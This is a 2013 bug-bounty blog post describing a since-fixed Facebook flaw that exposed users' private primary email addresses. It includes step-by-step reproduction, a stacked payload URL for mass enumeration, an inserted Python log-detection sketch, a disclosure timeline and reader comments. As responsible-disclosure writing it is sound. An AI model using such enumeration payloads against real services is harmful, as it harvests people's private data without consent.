Saturday, July 20, 2013

How I Exposed your Primary Facebook Email Address (Bug worth $4500)



Hi. In this post, I'll be talking about how I disclosed the private primary email address of any Facebook account, with no user interaction. Enjoy.


This bug was reported to the Facebook Security Team and fixed immediately.

Last month, I found a vulnerability in the Facebook Developer Application Roles page which allowed me to disclose the primary Facebook email address even if the victim set the email address privacy to "Only Me".

Steps to Reproduce

1. Grab profile links of all Facebook users from the Facebook People Directory, i.e. http://www.facebook.com/directory/people/
2. Collect the numerical Facebook ID for each profile from the Facebook Graph API, i.e. http://graph.facebook.com/sdfsdfsdafd.sdfdsafsdfds, where the extracted user ID is 100006240120652
3. Block the victim's Facebook account
4. Create a Facebook application -> go to Settings -> Developer Roles
5. The final payload for this vulnerability looks like this:

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID


Nevertheless, you can obtain multiple email addresses by adding more parameters:


https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10

and so forth...
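For defenders, the request shape above is easy to spot in web access logs: one application's roles page being asked about many unrelated user IDs through `unverified_groups[n][0]`. The following detection sketch is an added example, not code from the original post or from Facebook; the threshold, the function names and the sample app and user IDs are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

ROLES_PATH = re.compile(r"^/apps/(?P<app>[^/]+)/roles/?$")
GROUP_PARAM = re.compile(r"^unverified_groups\[\d+\]\[\d+\]$")

def extract_uids(url):
    """Return (app_id, [user IDs]) for a roles-page URL, or None for other URLs."""
    parts = urlsplit(url)
    m = ROLES_PATH.match(parts.path)
    if not m:
        return None
    # parse_qsl percent-decodes keys, so %5B/%5D-encoded brackets also match
    uids = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if GROUP_PARAM.match(k)]
    return m.group("app"), uids

def flag_enumeration(urls, max_distinct=3):
    """Return {app_id: distinct UID count} for apps referencing more than
    max_distinct user IDs across all of their roles-page requests."""
    seen = defaultdict(set)
    for url in urls:
        hit = extract_uids(url)
        if hit:
            app, uids = hit
            seen[app].update(uids)
    return {app: len(u) for app, u in seen.items() if len(u) > max_distinct}

# Constructed sample requests (app IDs and user IDs are made up)
SAMPLE = [
    "https://developers.facebook.com/apps/111/roles?unverified_groups[1][0]=1001",
    "https://developers.facebook.com/apps/222/roles"
    "?unverified_groups[1][0]=2001&unverified_groups[2][0]=2002",
    "https://developers.facebook.com/apps/222/roles"
    "?unverified_groups%5B1%5D%5B0%5D=2003&unverified_groups[2][0]=2004",
    "https://developers.facebook.com/apps/222/settings?unverified_groups[1][0]=9999",
]

if __name__ == "__main__":
    print(flag_enumeration(SAMPLE))
```

Aggregating per application rather than per request also catches the single-parameter form of the URL repeated with a different user ID each time.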



Dumping Like a Boss ;)

I reported this issue, and one hour later the Facebook Security Team responded to my initial report.



LoL! ;)

At exactly 8:26AM the vulnerability was finally fixed.



Final fix: 5 hours after initial report


Facebook was pretty fast to address this issue and resolved this within hours. Facebook Security team awarded this bug with $4500.






Facebook WhiteHat Card, baby!


I appreciate the opportunity to preserve my skills and gain some more experience. Thank you Facebook security team.

"Roy Castillo" - Facebook White Hat Page 2012 & 2013

- https://www.facebook.com/whitehat/thanks/


Protip: Focus on your target, think creatively, use your imagination, don't spend your time on attacks like reflected XSS etc. Try to find something special ;)


Disclosure Timeline

June 25th, 2013 at 1:22AM (GMT +08:00): Vulnerability Discovered
June 28th, 2013 at 2:43AM (GMT +08:00): Initial Report
June 28th, 2013 at 2:44AM (GMT +08:00): Autoresponse from Security bot
June 28th, 2013 at 3:41AM (GMT +08:00): First response from Security Team
June 28th, 2013 at 8:26AM (GMT +08:00): Vulnerability Fixed
July 6th, 2013 at 1:40AM (GMT +08:00): Confirmation from Rory that the vulnerability has been fixed
July 19th, 2013 at 1:08AM (GMT +08:00): Bounty awarded
July 21st, 2013 at 12:00NN (GMT +08:00): Full Disclosure Published



16 comments:

  1. But this is possible to obtain from the Yahoo import user list, too, nah?

    BTW, nice finding ;)

  2. Congrats! .. like a boss!! ;hehe

  3. Hey, that live feed thing is good.. I put it on my blog also.. And awesome, nice bug you got on FB..
    Congrats...

  4. Nice post man, I disagree with the Pro Tip, but well done.

  5. hmm... fixed bug, it's not good hahaha
